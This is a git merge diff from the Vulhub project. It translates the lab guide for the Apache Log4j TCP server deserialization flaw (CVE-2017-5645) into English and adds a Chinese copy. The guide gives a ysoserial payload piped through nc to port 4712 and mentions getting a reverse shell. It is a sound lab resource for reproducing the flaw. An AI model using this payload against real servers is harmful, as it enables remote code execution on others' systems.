Merge pull request vulhub#590 from vulhub/log4j-translate

[translate] log4j CVE-2017-5645

environments.toml

@@ -791,7 +791,7 @@ app = "Liferay Portal"
 path = "liferay-portal/CVE-2020-7961"
 
 [[environment]]
-name = "Apache Log4j Server Deserialization Command Execution"
+name = "Apache Log4j TCP Server Deserialization Remote Code Execution"
 cve = ["CVE-2017-5645"]
 app = "Apache Log4j"
 path = "log4j/CVE-2017-5645"

log4j/CVE-2017-5645/README.md

@@ -1,31 +1,38 @@
-# Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）
+# Apache Log4j TCP Server Deserialization Remote Code Execution (CVE-2017-5645)
 
-Apache Log4j是一个用于Java的日志记录库，其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
+[中文版本(Chinese version)](README.zh-cn.md)
 
-## 漏洞环境
+Apache Log4j is a logging library for Java that supports starting remote logging servers. A security vulnerability exists in versions 2.x before 2.8.2 of Apache Log4j TCP Server. Attackers can exploit this vulnerability to execute arbitrary code.
 
-执行如下命令启动漏洞环境
+References:
+
+- https://issues.apache.org/jira/browse/LOG4J2-1863
+- https://github.com/pimps/CVE-2017-5645
+
+## Environment Setup
+
+Execute the following command to start a Log4j 2.8.1 TCP server:
 
 ```
 docker compose up -d
 ```
 
-环境启动后，将在4712端口开启一个TCPServer。
+After the environment starts, a TCP server will be opened on port 4712.
 
-说一下，除了使用vulhub的docker镜像搭建环境外，我们下载了log4j的jar文件后可以直接在命令行启动这个TCPServer：`java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer`，无需使用vulhub和编写代码。
+Note: Besides using Vulhub's docker image to set up the environment, we can directly start this TCP server from the command line after downloading the log4j jar files: `java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer`, without needing to use Vulhub or write code.
 
-## 漏洞复现
+## Vulnerability Reproduction
 
-我们使用ysoserial生成payload，然后直接发送给`your-ip:4712`端口即可。
+We use ysoserial to generate a payload, then send it directly to the `your-ip:4712` port.
 
 ```
 java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712
 ```
 
-然后执行`docker compose exec log4j bash`进入容器，可见 /tmp/success 已成功创建：
+Then execute `docker compose exec log4j bash` to enter the container, and you can see that /tmp/success has been successfully created:
 
 ![](1.png)
 
-执行[反弹shell的命令](http://www.jackson-t.ca/runtime-exec-payloads.html)，成功弹回shell：
+Execute a [reverse shell command](http://www.jackson-t.ca/runtime-exec-payloads.html) to successfully get a shell:
 
 ![](2.png)

log4j/CVE-2017-5645/README.zh-cn.md

@@ -0,0 +1,36 @@
+# Apache Log4j TCP Server 反序列化命令执行漏洞（CVE-2017-5645）
+
+Apache Log4j是一个用于Java的日志记录库，其支持启动远程日志服务器。Apache Log4j TCP Server 2.8.2之前的2.x版本中存在反序列化漏洞，攻击者可利用该漏洞执行任意代码。
+
+参考链接：
+
+- https://issues.apache.org/jira/browse/LOG4J2-1863
+- https://github.com/pimps/CVE-2017-5645
+
+## 漏洞环境
+
+执行如下命令启动漏洞环境：
+
+```
+docker compose up -d
+```
+
+环境启动后，将在4712端口开启一个TCPServer。
+
+说一下，除了使用vulhub的docker镜像搭建环境外，我们下载了log4j的jar文件后可以直接在命令行启动这个TCPServer：`java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer`，无需使用vulhub和编写代码。
+
+## 漏洞复现
+
+我们使用ysoserial生成payload，然后直接发送给`your-ip:4712`端口即可。
+
+```
+java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712
+```
+
+然后执行`docker compose exec log4j bash`进入容器，可见 /tmp/success 已成功创建：
+
+![](1.png)
+
+执行[反弹shell的命令](http://www.jackson-t.ca/runtime-exec-payloads.html)，成功弹回shell：
+
+![](2.png)

log4j/CVE-2017-5645/docker-compose.yml

@@ -1,4 +1,3 @@
-version: '2'
 services:
  log4j:
    image: vulhub/log4j:2.8.1